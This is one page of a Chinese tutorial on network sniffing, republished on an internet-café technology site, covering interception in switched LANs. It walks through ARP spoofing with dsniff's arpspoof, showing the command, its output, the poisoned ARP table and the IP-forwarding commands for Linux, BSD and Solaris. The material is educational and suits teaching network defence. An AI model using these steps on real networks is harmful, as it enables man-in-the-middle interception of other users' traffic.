免费游戏更新软件网吧供求信息网吧求职招聘游戏更新情报全站搜索网吧论坛网络收藏夹BT下载
网站首页 | 网吧焦点 | 网盟论坛 | 网吧软件 | 网吧技术 | 地方频道 | 网吧方案 | 经营·管理 | 网吧政策 | 网吧配机 | 网吧资讯 | 博客
网吧展示 | 网络追踪 | 无盘技术 | 网吧系统 | 软件应用 | 硬件相关 | 网络技术 | 对比·更新 | 行业资讯 | 网吧程序 | 网游资讯 | 建站
 天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文
从入门到精通:网络监听技术最全面解析
作者:[Cnfan] 来源:[塞迪网] 时间:[2008-6-10]           ★★★ 添加到百度搜藏 添加到百度搜藏

 

  除了上述几种方式外,还有一些其他的方式,如:检测hub灯,但相比局限性就更大了,只能作为上述模式的补充。

  相对而言,对发生在本机的网络监听,是可以利用一些工具软件来发现的,比较简单,这里我们不介绍,有兴趣的读者可以参考cert等网站。

    交换机环境的网络监听

  文章到这里结束了吗?没有,我们还漏掉了一个很重要的监听手段-交换环境下面的网络听,这是个很有必要谈及的话题,笔者作为网络管理员参加了许多的工程决策,吃惊的发现许多的公司都还停留在交换机是局域网安全的彻底解决之道的概念上。

  应该认识到这个概念是个传说,是的,在以前,的确是这样的,但随着上面介绍的dsniff等软件的诞生,所谓交换机的安全已经成为一个传说了。

  本文前面的部分介绍了交换机工作的原理,不同于HUB的共享式报文方式,交换机转发的报文是一一对应的,由此看来,交换环境下再采用传统的共享式局域网下网络监听是不可行了,由于报文是一一对应转发的,普通的网络监听软件此时无法监听到交换环境下其它主机任何有价值的数据。

  交换机是安全的?

  不,还有一些别的方法,比如利用arp,本文一开始就提到了局域网内主机数据包的传送完成不是依靠ip地址,而是依靠arp找出ip地址对应的mac地址实现的。而我们知道arp协议是不可靠和无连接的,通常即使主机没有发出arp请求,也会接受发给它的arp回应,并将回应的mac和ip对应关系放入自己的arp缓存中。

  那么如果能利用这个特性,在这个环节中做些文章,还是可以截获数据包的。

  Arp理论的实践

  作者这里推荐一个不错的上述理论产物,dsniff,这个软件包中包括了filesnarf、 mailsnarf、msgsnarf、urlsnarf、dnsspoof、macof 等诸多很有特色的组件,可以捕获网络中的各种敏感数据,但这些不是今天感兴趣的主题,我们只看其中一个组件,arpspoof,这个组件就是上述arp理论的一个实践,它的工作原理是这样的:发起arpspoof的主机向目标主机发送伪造的arp应答包,骗取目标系统更新arp表,将目标系统的网关的mac地址修改为发起arpspoof的主机mac地址,使数据包都经由发起arpspoof的主机,这样即使系统连接在交换机上,也不会影响对数据包的攫取,由此就轻松的通过交换机实现了网络监听。   举例如下:

  主机a和b连接在交换机的同一个vlan上,

  A机的ip地址:192.168.1.37
  B机的ip地址:192.168.1.35,mac地址为:08-00-20-c8-fe-15
  网关的ip地址:192.168.1.33,mac地址为:00-90-6d-f2-24-00

  首先在a机上看看a机的arp表

    C:\ >arp -a
    nbsp; Interface: 192.168.1.37
    Internet Address Physical Address Type
    192.168.1.33 00-90-6d-f2-24-00 dynamic

    我们看到a机中保留着网关的ip地址192.168.1.33和对应的mac地址00-90-6d-f2-24-00

  我们在B机上执行arpspoof,将目标指向a机,宣称自己为网关,如下:

    HOSTB# arpspoof -t 192.168.1.37 192.168.1.33
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
    8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15

  可以看到b机持续向a发送arp回应包,宣称网关192.168.1.33的mac地址是自己!此时,我们在a机上看看arp表的内容,

    C:\>arp -a
    Interface: 192.168.1.37
    Internet Address Physical Address Type
    192.168.1.33 08-00-20-c8-fe-15 dynamic

  哈!a机的arp表已经改变了,网关的mac地址被更新为了 b机的mac地址,这样,当有数据包发送时,a机理所当然的会发到它arp表中网关对应的mac地址08-00-20-c8-fe-15,然而这个地方的b机正在等待着,悄然无声的冒充网关收发着a机的数据包。

  有一点要说明的是,为了让a机能正常使用网络,b机还必须打开数据转发,

  linux中可以使用sysctl -w net.ipv4.ip_forward = 1

  bsd系统可以使用sysctl -w net.inet.ip.forwarding =1

  solaris系统可以使用ndd -set /dev/ip ip_forwarding 1

  除了这样打开内核的支持外,也可以选用外部的fragrouter等转发软件,如此,就能确保a机正常工作了。

上一页  [1] [2] [3] [4] [5] [6] 下一页

下载免费游戏更新软件

关键字:网络监听
相关文章
从入门到精通:网络监听技术全解
  • 上一篇文章:
  • 下一篇文章:
  • 最新文章:
    普通文章 网吧Steam老是提示85.3M的更新
    普通文章 《地下城与勇士》将于7月14日版本更新后初始化欢乐代币券
    普通文章 国家互联网信息办公室公布《数据出境安全评估办法》,9月1日
    普通文章 2022年7月7日全网最低网吧显卡价格整理,多款显卡价格历史最
    普通文章 英雄联盟手游3.3版本曝光新英雄「虚空行者、沙漠玫瑰、亡灵战
    普通文章 微星公布MAG B660M MORTAR MAX WIFI
    推荐文章 网吧显卡、CPU装X工具及C#源码下载和分析
    普通文章 75%配列,铝合金材质  雷柏V700-8A多模式有线无线背光游戏机
    普通文章 老公30多了还老去网吧,爱去网吧的男人可靠吗?
    普通文章 2022-07-07日游戏更新信息,网吧、电竞酒店敬请关注(99)

    腾讯官方回应QQ「62

    6月26日晚起突然大规

    惊现李鬼版WeGame登

    网吧Radmin攻击事件

    吃鸡全国范围内网吧
    网友评论: 【点此发表评论】 【 看不懂,进入论坛讨论 】【 Top
    ::发表评论::
     姓 名:
     评 分: 1分 2分 3分 4分 5分
     评论内容:
  • 严禁发表危害国家安全、政治、黄色淫秽等内容的评论。
  • 用户需对自己在使用天下网吧服务过程中的行为承担法律责任。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表机友个人观点,与本网站立场无关。
  • 博客最新 更多..

    声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系邮箱:support@txwb.com.

    推荐文章
    推荐文章 6月26日晚起突然
    推荐文章 惊现李鬼版WeGa
    推荐文章 网吧大规模出现
    推荐文章 网吧WeGame登陆
    推荐文章 网吧做好系统安
    推荐文章 赶紧告诉网吧网
    最新文章
    普通文章 网吧Steam老是提
    普通文章 《地下城与勇士
    普通文章 国家互联网信息
    普通文章 2022年7月7日全
    普通文章 英雄联盟手游3.
    普通文章 微星公布MAG
    推荐文章 网吧显卡、CPU装
    普通文章 75%配列,铝合金
    普通文章 老公30多了还老
    普通文章 2022-07-07日游
    普通文章 早啊,读懂天下
    普通文章 网吧春节活动方
    推荐图文

    6月26日晚起突然大规模爆发Q

    惊现李鬼版WeGame登陆界面,

    网吧大规模出现WeGame「当前

    网吧WeGame登陆提示要扫码,

    网吧做好系统安全,防盗号三
     
    关于天下 | 联系方式 | 版权声明 | 免责条款 | 隐私保护
    Email :support#txwb.com (#换成@) 天下网吧,网吧天下,网吧联盟,天下网盟,网吧联盟欢迎你|提出意见